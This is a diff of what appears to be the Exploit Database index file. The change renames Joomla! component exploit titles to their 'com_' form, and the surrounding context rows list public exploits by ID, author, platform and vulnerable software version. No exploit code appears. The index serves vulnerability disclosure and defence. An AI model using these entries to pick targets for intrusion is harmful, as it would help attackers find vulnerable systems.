-34684,platforms/php/webapps/34684.pl,"Joomla! Component Spain - 'nv' Parameter SQL Injection",2010-09-20,FL0RiX,php,webapps,0
+34684,platforms/php/webapps/34684.pl,"Joomla! Component 'com_spain' - 'nv' Parameter SQL Injection",2010-09-20,FL0RiX,php,webapps,0
 34530,platforms/windows/dos/34530.py,"Crystal Player 1.98 - '.mls' Buffer Overflow",2010-08-20,"Praveen Darshanam",windows,dos,0
 34531,platforms/php/webapps/34531.txt,"BlastChat Client 3.3 - Cross-Site Scripting",2010-08-25,"Aung Khant",php,webapps,0
 34533,platforms/php/webapps/34533.txt,"Auto CMS 1.6 - 'autocms.php' Cross-Site Scripting",2010-08-23,"High-Tech Bridge SA",php,webapps,0
@@ -31354,7 +31354,7 @@ id,file,description,date,author,platform,type,port
 34705,platforms/php/webapps/34705.txt,"APBook 1.3 - Admin Login Multiple SQL Injection",2009-07-21,n3w7u,php,webapps,0
 34706,platforms/php/webapps/34706.txt,"MyDLstore Meta Search Engine Script 1.0 - 'url' Parameter Remote File Inclusion",2009-07-21,Moudi,php,webapps,0
 34707,platforms/php/webapps/34707.txt,"RadAFFILIATE Links - 'index.php' Cross-Site Scripting",2009-08-17,Moudi,php,webapps,0
-34708,platforms/php/webapps/34708.pl,"Joomla! Component com_tax - 'eid' Parameter SQL Injection",2010-09-23,FL0RiX,php,webapps,0
+34708,platforms/php/webapps/34708.pl,"Joomla! Component 'com_tax' - 'eid' Parameter SQL Injection",2010-09-23,FL0RiX,php,webapps,0
 34709,platforms/php/webapps/34709.txt,"Astrology - 'celebrities.php' Cross-Site Scripting",2009-07-20,Moudi,php,webapps,0
 34710,platforms/php/webapps/34710.txt,"Paypal Shopping Cart Script - 'index.php' Multiple Parameter Cross-Site Scripting",2009-08-21,"599eme Man",php,webapps,0
 34711,platforms/php/webapps/34711.txt,"Paypal Shopping Cart Script - 'index.php' cid Parameter SQL Injection",2009-08-21,"599eme Man",php,webapps,0
@@ -31453,7 +31453,7 @@ id,file,description,date,author,platform,type,port
 34813,platforms/php/webapps/34813.txt,"Elxis 2009.2 rev2631 - SQL Injection",2010-10-05,"High-Tech Bridge SA",php,webapps,0
 34814,platforms/php/webapps/34814.txt,"SquirrelMail Virtual Keyboard Plugin - 'vkeyboard.php' Cross-Site Scripting",2010-10-05,"Moritz Naumann",php,webapps,0
 34815,platforms/windows/remote/34815.html,"Microsoft Internet Explorer 8 - Fixed Col Span ID (Full ASLR + DEP + EMET 5.0 Bypass) (MS12-037)",2014-09-29,"ryujin & sickness",windows,remote,0
-34820,platforms/php/webapps/34820.pl,"Joomla! Component Club Manager - 'cm_id' Parameter SQL Injection",2010-10-06,FL0RiX,php,webapps,0
+34820,platforms/php/webapps/34820.pl,"Joomla! Component 'com_clubmanager' - 'cm_id' Parameter SQL Injection",2010-10-06,FL0RiX,php,webapps,0
 34817,platforms/windows/webapps/34817.rb,"Microsoft Exchange - IIS HTTP Internal IP Address Disclosure (Metasploit)",2014-09-29,"Nate Power",windows,webapps,0
 34818,platforms/php/webapps/34818.html,"OpenFiler 2.99.1 - Cross-Site Request Forgery",2014-09-29,"Dolev Farhi",php,webapps,446
 34975,platforms/php/webapps/34975.txt,"WordPress Plugin SEO Tools 3.0 - 'file' Parameter Directory Traversal",2010-11-08,"John Leitch",php,webapps,0
@@ -31465,11 +31465,11 @@ id,file,description,date,author,platform,type,port
 34830,platforms/windows/remote/34830.c,"IsoBuster 2.7 - 'wnaspi32.dll' DLL Loading Arbitrary Code Execution",2010-10-10,Pepelux,windows,remote,0
 34831,platforms/windows/remote/34831.c,"NetStumbler 0.4 - 'mfc71esn.dll' DLL Loading Arbitrary Code Execution",2010-10-10,Pepelux,windows,remote,0
 34832,platforms/windows/remote/34832.c,"Microsoft Visio 2007 - 'mfc80esn.dll' DLL Loading Arbitrary Code Execution",2010-10-10,Pepelux,windows,remote,0
-34833,platforms/php/webapps/34833.txt,"Joomla! / Mambo Component com_trade - 'PID' Parameter Cross-Site Scripting",2010-10-11,FL0RiX,php,webapps,0
+34833,platforms/php/webapps/34833.txt,"Joomla! / Mambo Component 'com_trade' - 'PID' Parameter Cross-Site Scripting",2010-10-11,FL0RiX,php,webapps,0
 34834,platforms/jsp/webapps/34834.txt,"Oracle Fusion Middleware 10.1.2/10.1.3 - BPEL Console Cross-Site Scripting",2010-10-12,"Alexander Polyakov",jsp,webapps,0
 34835,platforms/windows/remote/34835.py,"e2eSoft VCam - DLL Loading Arbitrary Code Execution",2010-10-12,anT!-Tr0J4n,windows,remote,0
 34836,platforms/windows/remote/34836.py,"Notepad++ 5.8.2 - 'libtidy.dll' DLL Loading Arbitrary Code Execution",2010-10-12,anT!-Tr0J4n,windows,remote,0
-34837,platforms/php/webapps/34837.txt,"Joomla! Component com_jstore - 'Controller' Parameter Local File Inclusion",2010-10-13,jos_ali_joe,php,webapps,0
+34837,platforms/php/webapps/34837.txt,"Joomla! Component 'com_jstore' - 'Controller' Parameter Local File Inclusion",2010-10-13,jos_ali_joe,php,webapps,0
 34838,platforms/windows/remote/34838.c,"Torrent DVD Creator - 'quserex.dll' DLL Loading Arbitrary Code Execution",2010-10-13,anT!-Tr0J4n,windows,remote,0
 34839,platforms/cgi/webapps/34839.py,"IPFire - Cgi Web Interface Authenticated Bash Environment Variable Code Injection",2014-10-01,"Claudio Viviani",cgi,webapps,0
 34840,platforms/php/webapps/34840.txt,"Ronny CMS 1.1 r935 - Multiple HTML Injection Vulnerabilities",2010-10-13,"High-Tech Bridge SA",php,webapps,0
@@ -31529,7 +31529,7 @@ id,file,description,date,author,platform,type,port
 34896,platforms/linux/remote/34896.py,"Postfix SMTP 4.2.x < 4.2.48 - Remote Exploit (Shellshock)",2014-10-06,"Phil Blank",linux,remote,0
 34922,platforms/php/webapps/34922.txt,"Wordpress Plugin Creative Contact Form 0.9.7 - Arbitrary File Upload",2014-10-08,"Gianni Angelozzi",php,webapps,0
 35023,platforms/php/webapps/35023.txt,"Wernhart Guestbook 2001.03.28 - Multiple SQL Injections",2010-11-29,"Aliaksandr Hartsuyeu",php,webapps,0
-35024,platforms/php/webapps/35024.txt,"Joomla! Component Catalogue - SQL Injection / Local File Inclusion",2010-11-30,XroGuE,php,webapps,0
+35024,platforms/php/webapps/35024.txt,"Joomla! Component 'com_catalogue' - SQL Injection / Local File Inclusion",2010-11-30,XroGuE,php,webapps,0
 34900,platforms/linux/remote/34900.py,"Apache mod_cgi - Remote Exploit (Shellshock)",2014-10-06,"Federico Galatolo",linux,remote,0
 34902,platforms/php/webapps/34902.txt,"PHP Scripts Now Riddles - /riddles/results.php searchQuery Parameter Cross-Site Scripting",2009-08-20,Moudi,php,webapps,0
 34903,platforms/php/webapps/34903.txt,"PHP Scripts Now Riddles - /riddles/list.php catid Parameter SQL Injection",2009-08-20,Moudi,php,webapps,0
@@ -31599,7 +31599,7 @@ id,file,description,date,author,platform,type,port
 34969,platforms/hardware/webapps/34969.html,"Tenda A32 Router - Cross-Site Request Forgery",2014-10-14,zixian,hardware,webapps,0
 34970,platforms/php/webapps/34970.py,"SEO Control Panel 3.6.0 - Authenticated SQL Injection",2014-10-14,"Tiago Carvalho",php,webapps,0
 34971,platforms/asp/webapps/34971.txt,"Angel Learning Management System 7.3 - 'pdaview.asp' Cross-Site Scripting",2010-11-05,"Wesley Kerfoot",asp,webapps,0
-34972,platforms/php/webapps/34972.txt,"Joomla! Component AutoArticles 3000 - 'id' Parameter SQL Injection",2010-11-05,jos_ali_joe,php,webapps,0
+34972,platforms/php/webapps/34972.txt,"Joomla! Component 'com_a3000' - 'id' Parameter SQL Injection",2010-11-05,jos_ali_joe,php,webapps,0
 34973,platforms/php/webapps/34973.txt,"WordPress Plugin FeedList 2.61.01 - 'handler_image.php' Cross-Site Scripting",2010-11-08,"John Leitch",php,webapps,0
 34974,platforms/php/webapps/34974.txt,"WordPress Plugin WP Survey And Quiz Tool 1.2.1 - Cross-Site Scripting",2010-11-08,"John Leitch",php,webapps,0
 34982,platforms/win_x86/local/34982.rb,"Microsoft Bluetooth Personal Area Networking - 'BthPan.sys' Privilege Escalation (Metasploit)",2014-10-15,Metasploit,win_x86,local,0
@@ -31639,7 +31639,7 @@ id,file,description,date,author,platform,type,port
 35020,platforms/win_x86/local/35020.rb,"Microsoft Windows - OLE Package Manager Code Execution (MS14-060)",2014-10-20,Metasploit,win_x86,local,0
 35021,platforms/linux/local/35021.rb,"Linux PolicyKit - Race Condition Privilege Escalation (Metasploit)",2014-10-20,Metasploit,linux,local,0
 35025,platforms/php/webapps/35025.html,"Car Portal 2.0 - 'car_make' Parameter Cross-Site Scripting",2010-11-29,"Underground Stockholm",php,webapps,0
-35026,platforms/php/webapps/35026.txt,"Joomla! Component Store Directory - 'id' Parameter SQL Injection",2010-11-30,XroGuE,php,webapps,0
+35026,platforms/php/webapps/35026.txt,"Joomla! Component 'com_storedirectory' - 'id' Parameter SQL Injection",2010-11-30,XroGuE,php,webapps,0
 35027,platforms/php/webapps/35027.txt,"E-lokaler CMS 2 - Admin Login Multiple SQL Injection",2010-11-26,ali_err0r,php,webapps,0
 35028,platforms/php/webapps/35028.txt,"SmartBox - 'page_id' Parameter SQL Injection",2010-11-26,KnocKout,php,webapps,0
 35032,platforms/windows/remote/35032.rb,"Numara / BMC Track-It! FileStorageService - Arbitrary File Upload (Metasploit)",2014-10-21,Metasploit,windows,remote,0
@@ -31647,7 +31647,7 @@ id,file,description,date,author,platform,type,port
 35033,platforms/php/remote/35033.rb,"Joomla! Component Akeeba Kickstart - Unserialize Remote Code Execution (Metasploit)",2014-10-21,Metasploit,php,remote,80
 35034,platforms/multiple/remote/35034.rb,"HP Data Protector - EXEC_INTEGUTIL Remote Code Execution (Metasploit)",2014-10-21,Metasploit,multiple,remote,5555
 35035,platforms/cgi/webapps/35035.txt,"AWStats 6.x - Apache Tomcat Configuration File Arbitrary Command Execution",2010-11-30,StenoPlasma,cgi,webapps,0
-35036,platforms/php/webapps/35036.txt,"Joomla! Component Annuaire - 'id' Parameter SQL Injection",2010-12-02,"Ashiyane Digital Security Team",php,webapps,0
+35036,platforms/php/webapps/35036.txt,"Joomla! Component 'com_annuaire' - 'id' Parameter SQL Injection",2010-12-02,"Ashiyane Digital Security Team",php,webapps,0
 35037,platforms/ios/webapps/35037.txt,"iFunBox Free 1.1 iOS - File Inclusion",2014-10-22,Vulnerability-Lab,ios,webapps,8000
 35038,platforms/ios/webapps/35038.txt,"File Manager 4.2.10 iOS - Code Execution",2014-10-22,Vulnerability-Lab,ios,webapps,80
 35039,platforms/windows/webapps/35039.rb,"DotNetNuke DNNspot Store 3.0.0 - Arbitrary File Upload (Metasploit)",2014-10-22,"Glafkos Charalambous ",windows,webapps,0
@@ -31705,15 +31705,15 @@ id,file,description,date,author,platform,type,port
 35086,platforms/multiple/dos/35086.rb,"Allegro RomPager 4.07 - UPnP HTTP Request Remote Denial of Service",2010-12-08,"Ricky-Lee Birtles",multiple,dos,0
 35087,platforms/php/webapps/35087.txt,"net2ftp 0.98 - (stable) 'admin1.template.php' Local File Inclusion / Remote File Inclusion",2010-12-09,"Marcin Ressel",php,webapps,0
 35088,platforms/php/webapps/35088.txt,"PHP State - 'id' Parameter SQL Injection",2010-12-09,jos_ali_joe,php,webapps,0
-35089,platforms/php/webapps/35089.txt,"Joomla! Component Jeformcr - 'id' Parameter SQL Injection",2010-12-09,FL0RiX,php,webapps,0
-35090,platforms/php/webapps/35090.txt,"Joomla! Component JExtensions Property Finder - 'sf_id' Parameter SQL Injection",2010-12-10,FL0RiX,php,webapps,0
+35089,platforms/php/webapps/35089.txt,"Joomla! Component 'com_jeformcr' - 'id' Parameter SQL Injection",2010-12-09,FL0RiX,php,webapps,0
+35090,platforms/php/webapps/35090.txt,"Joomla! Component 'com_jesectionfinder' - 'sf_id' Parameter SQL Injection",2010-12-10,FL0RiX,php,webapps,0
 35091,platforms/php/webapps/35091.txt,"ManageEngine EventLog Analyzer 6.1 - Multiple Cross-Site Scripting Vulnerabilities",2010-12-10,"Rob Kraus",php,webapps,0
 35092,platforms/multiple/remote/35092.html,"Helix Server 14.0.1.571 - Administration Interface Cross-Site Request Forgery",2010-12-10,"John Leitch",multiple,remote,0
 35093,platforms/cgi/webapps/35093.txt,"BizDir 05.10 - 'f_srch' Parameter Cross-Site Scripting",2010-12-10,"Aliaksandr Hartsuyeu",cgi,webapps,0
 35094,platforms/php/webapps/35094.txt,"slickMsg 0.7-alpha - 'top.php' Cross-Site Scripting",2010-12-10,"Aliaksandr Hartsuyeu",php,webapps,0
 35095,platforms/linux/remote/35095.txt,"Mozilla Firefox/Thunderbird/SeaMonkey - Multiple HTML Injection Vulnerabilities",2010-12-09,"Yosuke Hasegawa",linux,remote,0
-35096,platforms/php/webapps/35096.txt,"Joomla! Component com_mailto - Multiple Cross-Site Scripting Vulnerabilities",2010-12-10,MustLive,php,webapps,0
-35097,platforms/php/webapps/35097.txt,"Joomla! Component Redirect 'com_redirect' 1.5.19 - Local File Inclusion",2010-12-13,jos_ali_joe,php,webapps,0
+35096,platforms/php/webapps/35096.txt,"Joomla! Component 'com_mailto' - Multiple Cross-Site Scripting Vulnerabilities",2010-12-10,MustLive,php,webapps,0
+35097,platforms/php/webapps/35097.txt,"Joomla! Component 'com_redirect' 1.5.19 - Local File Inclusion",2010-12-13,jos_ali_joe,php,webapps,0
 35098,platforms/php/webapps/35098.txt,"Enalean Tuleap 7.4.99.5 - Blind SQL Injection",2014-10-28,Portcullis,php,webapps,80
 35099,platforms/php/webapps/35099.txt,"Enalean Tuleap 7.2 - XXE File Disclosure",2014-10-28,Portcullis,php,webapps,80
 35100,platforms/php/webapps/35100.txt,"Enalean Tuleap 7.4.99.5 - Remote Command Execution",2014-10-28,Portcullis,php,webapps,80
@@ -31751,7 +31751,7 @@ id,file,description,date,author,platform,type,port
 35132,platforms/linux/remote/35132.txt,"Mitel Audio and Web Conferencing (AWC) - Arbitrary Shell Command Injection",2010-12-21,"Jan Fry",linux,remote,0
 35133,platforms/php/webapps/35133.txt,"WordPress Plugin Mediatricks Viva Thumbs - Multiple Information Disclosure Vulnerabilities",2010-12-21,"Richard Brain",php,webapps,0
 35134,platforms/php/webapps/35134.txt,"ImpressCMS 1.2.x - 'quicksearch_ContentContent' Parameter HTML Injection",2010-12-21,"High-Tech Bridge SA",php,webapps,0
-35135,platforms/php/webapps/35135.txt,"Joomla! Component Classified - SQL Injection",2010-12-22,R4dc0re,php,webapps,0
+35135,platforms/php/webapps/35135.txt,"Joomla! Component 'com_classified' - SQL Injection",2010-12-22,R4dc0re,php,webapps,0
 35136,platforms/php/webapps/35136.txt,"WordPress Plugin Accept Signups 0.1 - 'email' Parameter Cross-Site Scripting",2010-12-22,clshack,php,webapps,0
 35137,platforms/php/webapps/35137.txt,"Social Share - 'vote.php' HTTP Response Splitting",2010-12-10,"Aliaksandr Hartsuyeu",php,webapps,0
 35138,platforms/php/webapps/35138.txt,"Esotalk CMS 1.0.0g4 - Cross-Site Scripting",2014-11-02,evi1m0,php,webapps,0
@@ -31817,7 +31817,7 @@ id,file,description,date,author,platform,type,port
 35208,platforms/hardware/webapps/35208.txt,"Barracuda - Multiple Anauthentificated Logfile Download",2014-11-10,4CKnowLedge,hardware,webapps,0
 35292,platforms/php/webapps/35292.html,"vBSEO 3.2.2/3.5.2 - Multiple Cross-Site Scripting Vulnerabilities",2011-01-30,MaXe,php,webapps,0
 35291,platforms/php/webapps/35291.txt,"Vanilla Forums 2.0.16 - 'Target' Parameter Cross-Site Scripting",2011-01-27,"YGN Ethical Hacker Group",php,webapps,0
-35295,platforms/php/webapps/35295.txt,"Joomla! Component com_frontenduseraccess - Local File Inclusion",2011-02-01,wishnusakti,php,webapps,0
+35295,platforms/php/webapps/35295.txt,"Joomla! Component 'com_frontenduseraccess' - Local File Inclusion",2011-02-01,wishnusakti,php,webapps,0
 35296,platforms/php/webapps/35296.txt,"eSyndiCat Directory Software 2.2/2.3 - 'preview' Parameter Cross-Site Scripting",2011-01-30,"Avram Marius",php,webapps,0
 35297,platforms/php/webapps/35297.txt,"Moodle 2.0.1 - 'PHPCOVERAGE_HOME' Cross-Site Scripting",2011-02-01,"AutoSec Tools",php,webapps,0
 35298,platforms/php/webapps/35298.txt,"TinyWebGallery 1.8.3 - Cross-Site Scripting / Local File Inclusion",2011-02-01,"Yam Mesicka",php,webapps,0
@@ -31853,7 +31853,7 @@ id,file,description,date,author,platform,type,port
 35245,platforms/php/webapps/35245.txt,"PHPAuctions - 'viewfaqs.php' SQL Injection",2011-01-19,"BorN To K!LL",php,webapps,0
 35246,platforms/php/webapps/35246.py,"Joomla! Component 'com_hdflvplayer' < 2.1.0.1 - Arbitrary File Download",2014-11-15,"Claudio Viviani",php,webapps,0
 35248,platforms/multiple/webapps/35248.txt,"clientResponse Client Management 4.1 - Cross-Site Scripting",2014-11-15,"Halil Dalabasmaz",multiple,webapps,0
-35293,platforms/php/webapps/35293.txt,"Joomla! Component VirtueMart eCommerce 1.1.6 - SQL Injection",2011-01-31,"Andrea Fabrizi",php,webapps,0
+35293,platforms/php/webapps/35293.txt,"Joomla! Component 'com_virtuemart' 1.1.6 - SQL Injection",2011-01-31,"Andrea Fabrizi",php,webapps,0
 35288,platforms/php/webapps/35288.txt,"WordPress Plugin oQey-Gallery 0.2 - 'tbpv_domain' Parameter Cross-Site Scripting",2011-01-24,"AutoSec Tools",php,webapps,0
 35289,platforms/php/webapps/35289.txt,"WordPress Plugin FCChat Widget 2.1.7 - 'path' Parameter Cross-Site Scripting",2011-01-25,"AutoSec Tools",php,webapps,0
 35290,platforms/php/webapps/35290.txt,"SimpGB 1.49.2 - 'Guestbook.php' Multiple Cross-Site Scripting Vulnerabilities",2011-01-26,MustLive,php,webapps,0
@@ -31887,7 +31887,7 @@ id,file,description,date,author,platform,type,port
 35278,platforms/php/webapps/35278.txt,"Zoph 0.9.1 - Multiple Vulnerabilities",2014-11-17,"Manuel García Cárdenas",php,webapps,80
 35279,platforms/osx/dos/35279.html,"Apple Mac OSX Safari 8.0 - Crash (PoC)",2014-11-17,w3bd3vil,osx,dos,0
 35280,platforms/windows/remote/35280.txt,".NET Remoting Services - Remote Command Execution",2014-11-17,"James Forshaw",windows,remote,0
-35294,platforms/php/webapps/35294.txt,"Joomla! Component com_clan_members - 'id' Parameter SQL Injection",2011-02-01,FL0RiX,php,webapps,0
+35294,platforms/php/webapps/35294.txt,"Joomla! Component 'com_clan_members' - 'id' Parameter SQL Injection",2011-02-01,FL0RiX,php,webapps,0
 35282,platforms/android/remote/35282.rb,"Samsung Galaxy KNOX Android Browser - Remote Code Execution (Metasploit)",2014-11-18,Metasploit,android,remote,0
 35283,platforms/php/remote/35283.rb,"MantisBT XmlImportExport Plugin - PHP Code Injection (Metasploit)",2014-11-18,Metasploit,php,remote,80
 35300,platforms/php/webapps/35300.txt,"WordPress Plugin TagNinja 1.0 - 'id' Parameter Cross-Site Scripting",2011-02-01,"AutoSec Tools",php,webapps,0
@@ -32196,7 +32196,7 @@ id,file,description,date,author,platform,type,port
 35625,platforms/php/webapps/35625.txt,"PMB 4.1.3 - Authenticated SQL Injection",2014-12-27,"xd4rker dark",php,webapps,0
 35626,platforms/php/webapps/35626.txt,"Easy File Sharing WebServer 6.8 - Persistent Cross-Site Scripting",2014-12-27,"Sick Psycko",php,webapps,0
 35629,platforms/php/webapps/35629.txt,"ChillyCMS 1.2.1 - Multiple Remote File Inclusion",2011-04-16,KedAns-Dz,php,webapps,0
-35630,platforms/php/webapps/35630.txt,"Joomla! Component com_phocadownload - Local File Inclusion",2011-04-18,KedAns-Dz,php,webapps,0
+35630,platforms/php/webapps/35630.txt,"Joomla! Component 'com_phocadownload' - Local File Inclusion",2011-04-18,KedAns-Dz,php,webapps,0
 35631,platforms/php/webapps/35631.txt,"CRESUS - 'recette_detail.php' SQL Injection",2011-04-19,"GrayHatz Security Group",php,webapps,0
 35632,platforms/php/webapps/35632.txt,"XOOPS 2.5 - 'imagemanager.php' Local File Inclusion",2011-04-18,KedAns-Dz,php,webapps,0
 35633,platforms/php/webapps/35633.txt,"Ultra Marketing Enterprises CMS and Cart - Multiple SQL Injections",2011-04-19,eXeSoul,php,webapps,0
@@ -32297,7 +32297,7 @@ id,file,description,date,author,platform,type,port
 35742,platforms/osx/local/35742.c,"Apple Mac OSX 10.9.x - sysmond XPC Privilege Escalation",2015-01-10,"Google Security Research",osx,local,0
 35743,platforms/multiple/webapps/35743.txt,"Flash Tag Cloud And MT-Cumulus Plugin - 'tagcloud' Parameter Cross-Site Scripting",2011-05-13,MustLive,multiple,webapps,0
 35744,platforms/windows/remote/35744.pl,"AVS Ringtone Maker 1.6.1 - '.au' File Remote Buffer Overflow",2011-05-16,KedAns-Dz,windows,remote,0
-35745,platforms/php/webapps/35745.txt,"Joomla! Component com_cbcontact - 'contact_id' Parameter SQL Injection",2011-05-16,KedAns-Dz,php,webapps,0
+35745,platforms/php/webapps/35745.txt,"Joomla! Component 'com_cbcontact' - 'contact_id' Parameter SQL Injection",2011-05-16,KedAns-Dz,php,webapps,0
 35746,platforms/linux/local/35746.sh,"RedStar 3.0 Desktop - (Enable sudo) Privilege Escalation",2015-01-11,"prdelka & ‏sfan55",linux,local,0
 35747,platforms/hardware/webapps/35747.pl,"D-Link DSL-2730B Modem - Cross-Site Scripting Injection Stored Exploit Wlsecrefresh.wl & Wlsecurity.wl",2015-01-11,"XLabs Security",hardware,webapps,0
 35748,platforms/linux/local/35748.txt,"RedStar 2.0 Desktop - (World-writeable rc.sysinit) Privilege Escalation",2015-01-11,prdelka,linux,local,0
@@ -32339,7 +32339,7 @@ id,file,description,date,author,platform,type,port
 35784,platforms/linux/remote/35784.php,"Zend Framework 1.11.4 - 'PDO_MySql' Security Bypass",2011-05-19,"Anthony Ferrara",linux,remote,0
 35785,platforms/linux/remote/35785.txt,"klibc 1.5.2 - DHCP Options Processing Remote Shell Command Execution",2011-05-18,"maximilian attems",linux,remote,0
 35787,platforms/php/webapps/35787.txt,"LimeSurvey 1.85+ - 'admin.php' Cross-Site Scripting",2011-05-19,"Juan Manuel Garcia",php,webapps,0
-35788,platforms/php/webapps/35788.txt,"Joomla! Component com_maplocator - 'cid' Parameter SQL Injection",2011-05-23,FL0RiX,php,webapps,0
+35788,platforms/php/webapps/35788.txt,"Joomla! Component 'com_maplocator' - 'cid' Parameter SQL Injection",2011-05-23,FL0RiX,php,webapps,0
 35789,platforms/php/webapps/35789.txt,"phpScheduleIt 1.2.12 - Multiple Cross-Site Scripting Vulnerabilities",2011-05-24,"High-Tech Bridge SA",php,webapps,0
 35790,platforms/multiple/remote/35790.py,"Lumension Security Lumension Device Control 4.x - Memory Corruption",2011-05-24,"Andy Davis",multiple,remote,0
 35791,platforms/php/webapps/35791.txt,"Ajax Chat 1.0 - 'ajax-chat.php' Cross-Site Scripting",2011-05-24,"High-Tech Bridge SA",php,webapps,0
@@ -32349,7 +32349,7 @@ id,file,description,date,author,platform,type,port
 35803,platforms/php/webapps/35803.txt,"Cotonti 0.9.2 - Multiple SQL Injections",2011-05-30,KedAns-Dz,php,webapps,0
 35804,platforms/windows/dos/35804.txt,"NetVault: SmartDisk 1.2 - 'libnvbasics.dll' Remote Denial of Service",2011-05-28,"Luigi Auriemma",windows,dos,0
 35796,platforms/php/webapps/35796.txt,"MidiCMS Website Builder - Local File Inclusion / Arbitrary File Upload",2011-05-25,KedAns-Dz,php,webapps,0
-35797,platforms/php/webapps/35797.txt,"Joomla! Component com_shop - SQL Injection",2011-05-25,"ThunDEr HeaD",php,webapps,0
+35797,platforms/php/webapps/35797.txt,"Joomla! Component 'com_shop' - SQL Injection",2011-05-25,"ThunDEr HeaD",php,webapps,0
 35798,platforms/php/webapps/35798.txt,"Kryn.cms 0.9 - '_kurl' Parameter Cross-Site Scripting",2011-05-25,"AutoSec Tools",php,webapps,0
 35799,platforms/linux/remote/35799.txt,"Vordel Gateway 6.0.3 - Directory Traversal",2011-05-25,"Brian W. Gary",linux,remote,0
 35800,platforms/hardware/remote/35800.txt,"RXS-3211 IP Camera - UDP Packet Password Information Disclosure",2011-05-25,"Spare Clock Cycles",hardware,remote,0
@@ -32377,8 +32377,8 @@ id,file,description,date,author,platform,type,port
 35824,platforms/php/webapps/35824.txt,"vBulletin vBExperience 3 - 'sortorder' Parameter Cross-Site Scripting",2011-06-06,Mr.ThieF,php,webapps,0
 35985,platforms/php/webapps/35985.txt,"Support Incident Tracker (SiT!) 3.63 p1 - report_marketing.php exc[] Parameter SQL Injection",2011-07-26,"Yuri Goltsev",php,webapps,0
 35986,platforms/php/webapps/35986.txt,"Support Incident Tracker (SiT!) 3.63 p1 - billable_incidents.php sites[] Parameter SQL Injection",2011-07-26,"Yuri Goltsev",php,webapps,0
-35984,platforms/php/webapps/35984.txt,"Joomla! Component Virtual Money 'com_virtualmoney' 1.5 - SQL Injection",2011-07-25,FL0RiX,php,webapps,0
-35826,platforms/php/webapps/35826.txt,"Joomla! Component CCBoard - SQL Injection / Arbitrary File Upload",2011-06-06,KedAns-Dz,php,webapps,0
+35984,platforms/php/webapps/35984.txt,"Joomla! Component 'com_virtualmoney' 1.5 - SQL Injection",2011-07-25,FL0RiX,php,webapps,0
+35826,platforms/php/webapps/35826.txt,"Joomla! Component 'com_ccboard' - SQL Injection / Arbitrary File Upload",2011-06-06,KedAns-Dz,php,webapps,0
 35827,platforms/windows/dos/35827.py,"JetAudio 8.1.3 - '.mp4' Crash (PoC)",2014-12-12,"Drozdova Liudmila",windows,dos,0
 35828,platforms/windows/dos/35828.py,"Winamp 5.666 build 3516 - (Corrupted flv) Crash (PoC)",2014-12-12,"Drozdova Liudmila",windows,dos,0
 35829,platforms/php/webapps/35829.txt,"Nakid CMS 1.0.2 - 'CKEditorFuncNum' Parameter Cross-Site Scripting",2011-06-06,"AutoSec Tools",php,webapps,0
@@ -32437,7 +32437,7 @@ id,file,description,date,author,platform,type,port
 35880,platforms/windows/remote/35880.html,"LeadTools Imaging LEADSmtp - ActiveX Control 'SaveMessage()' Insecure Method",2011-06-23,"High-Tech Bridge SA",windows,remote,0
 35881,platforms/windows/remote/35881.c,"xAurora 10.00 - 'RSRC32.dll' DLL Loading Arbitrary Code Execution",2011-06-24,"Zer0 Thunder",windows,remote,0
 35882,platforms/php/webapps/35882.txt,"Nodesforum - '_nodesforum_node' Parameter SQL Injection",2011-06-23,"Andrea Bocchetti",php,webapps,0
-35883,platforms/php/webapps/35883.txt,"Joomla! Component com_morfeoshow - 'idm' Parameter SQL Injection",2011-06-27,Th3.xin0x,php,webapps,0
+35883,platforms/php/webapps/35883.txt,"Joomla! Component 'com_morfeoshow' - 'idm' Parameter SQL Injection",2011-06-27,Th3.xin0x,php,webapps,0
 35884,platforms/php/webapps/35884.txt,"Mambo 4.6.x - Multiple Cross-Site Scripting Vulnerabilities",2011-06-27,"Aung Khant",php,webapps,0
 35885,platforms/windows/remote/35885.txt,"Ubisoft CoGSManager ActiveX Control 1.0.0.23 - 'Initialize()' Method Stack Buffer Overflow",2011-06-27,"Luigi Auriemma",windows,remote,0
 35886,platforms/windows/remote/35886.txt,"Sybase Advantage Server 10.0.0.3 - 'ADS' Process Off-by-One Buffer Overflow",2011-06-27,"Luigi Auriemma",windows,remote,0
@@ -32480,14 +32480,14 @@ id,file,description,date,author,platform,type,port
 35919,platforms/bsd/remote/35919.c,"NetBSD 5.1 - Multiple 'libc/net' functions Stack Buffer Overflow",2011-07-01,"Maksymilian Arciemowicz",bsd,remote,0
 35920,platforms/php/webapps/35920.txt,"WebCalendar 1.2.3 - Multiple Cross-Site Scripting Vulnerabilities (2)",2011-07-04,"Stefan Schurtz",php,webapps,0
 35921,platforms/windows/remote/35921.html,"iMesh 10.0 - 'IMWebControl.dll' ActiveX Control Buffer Overflow",2011-07-04,KedAns-Dz,windows,remote,0
-35922,platforms/php/webapps/35922.txt,"Joomla! Component com_jr_tfb - 'Controller' Parameter Local File Inclusion",2011-07-05,FL0RiX,php,webapps,0
+35922,platforms/php/webapps/35922.txt,"Joomla! Component 'com_jr_tfb' - 'Controller' Parameter Local File Inclusion",2011-07-05,FL0RiX,php,webapps,0
 35923,platforms/asp/webapps/35923.txt,"Paliz Portal - Cross-Site Scripting / Multiple SQL Injection",2011-07-02,Net.Edit0r,asp,webapps,0
 35924,platforms/windows/remote/35924.py,"ClearSCADA - Remote Authentication Bypass",2015-01-28,"Jeremy Brown",windows,remote,0
 35925,platforms/hardware/remote/35925.txt,"Portech MV-372 VoIP Gateway - Multiple Security Vulnerabilities",2011-07-05,"Zsolt Imre",hardware,remote,0
 35926,platforms/asp/webapps/35926.txt,"eTAWASOL - 'id' Parameter SQL Injection",2011-07-03,Bl4ck.Viper,asp,webapps,0
 35927,platforms/php/webapps/35927.txt,"Classified Script - c-BrowseClassified URL Cross-Site Scripting",2011-07-05,"Raghavendra Karthik D",php,webapps,0
 35928,platforms/windows/remote/35928.html,"Pro Softnet IDrive Online Backup 3.4.0 - ActiveX SaveToFile() Arbitrary File Overwrite",2011-07-06,"High-Tech Bridge SA",windows,remote,0
-35929,platforms/php/webapps/35929.txt,"Joomla! Component com_voj - SQL Injection",2011-07-08,CoBRa_21,php,webapps,0
+35929,platforms/php/webapps/35929.txt,"Joomla! Component 'com_voj' - SQL Injection",2011-07-08,CoBRa_21,php,webapps,0
 35930,platforms/php/webapps/35930.txt,"Prontus CMS - 'page' Parameter Cross-Site Scripting",2011-07-11,Zerial,php,webapps,0
 35931,platforms/php/webapps/35931.txt,"ICMusic 1.2 - 'music_id' Parameter SQL Injection",2011-07-11,kaMtiEz,php,webapps,0
